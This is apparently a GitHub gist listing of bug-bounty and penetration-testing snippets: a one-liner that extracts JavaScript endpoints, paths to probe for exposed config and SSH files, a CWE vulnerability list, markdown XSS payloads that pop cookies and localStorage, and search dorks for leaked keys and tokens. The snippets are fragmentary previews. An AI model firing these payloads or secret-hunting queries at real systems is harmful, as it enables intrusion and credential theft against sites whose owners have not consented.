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moodiabdoul3 /
Created May 9, 2020 20:21
St8out - Extra one-liner for reconnaissance
# St8out - Extra one-liner for reconnaissance
# Usage: ./
# Resources:
# -
moodiabdoul3 /
Created May 9, 2020 20:19
Penetrating Testing/Assessment Workflow

Penetrating Testing/Assessment Workflow & other fun infosec stuff

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

moodiabdoul3 /
Created April 25, 2020 10:32 — forked from gwen001/
onliner to extract endpoints from JS files of a given host
curl -L -k -s | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# debug mode and absolute/relative urls support (the best one):
function ejs() {
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d
/.s3cfg | grep -Hnri "website_endpoint"
/phpunit.xml | grep -Hnri "<\phpunit"
/nginx.conf | grep -Hnri '/var/run/'
/.vimrc | grep -Hnri 'vim-'
/yarn.lock | grep -Hnri 'yarn lockfile'
/.idea/workspace.xml | grep -Hnri '<project version="4">'
/composer.json | grep -Hnri '"autoload"'
/Homestead.yaml | grep -Hnri 'provider: virtualbox'
/Vagrantfile | grep -Hnri 'VAGRANTFILE_API_VERSION'
/.ssh/known_hosts | grep -Hnri 'ssh-rsa'
moodiabdoul3 / short-wordlist.txt
Last active February 29, 2020 16:42 — forked from tomnomnom/short-wordlist.txt
moodiabdoul3 / all.txt
Created January 17, 2020 22:02 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
moodiabdoul3 / vuln_list.txt
Created January 16, 2020 02:14 — forked from Lopseg/vuln_list.txt
150 vulnerability types that you can submit for. Thanks to @thecybermentor and hackerone.
Account Hijacking
Allocation of Resources Without Limits or Throttling - CWE-770
Array Index Underflow - CWE-129
Authentication Bypass Using an Alternate Path or Channel - CWE-288
Brute Force - CWE-307
Buffer Over-read - CWE-126
Buffer Underflow - CWE-124
Buffer Under-read - CWE-127
Business Logic Errors - CWE-840
Classic Buffer Overflow - CWE-120
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[In Quotes]('javascript:alert("InQuotes")')
![Escape SRC - onload]("onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
[XSS](j a v a s c r i p t:prompt(document.cookie))
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password 
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://  
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces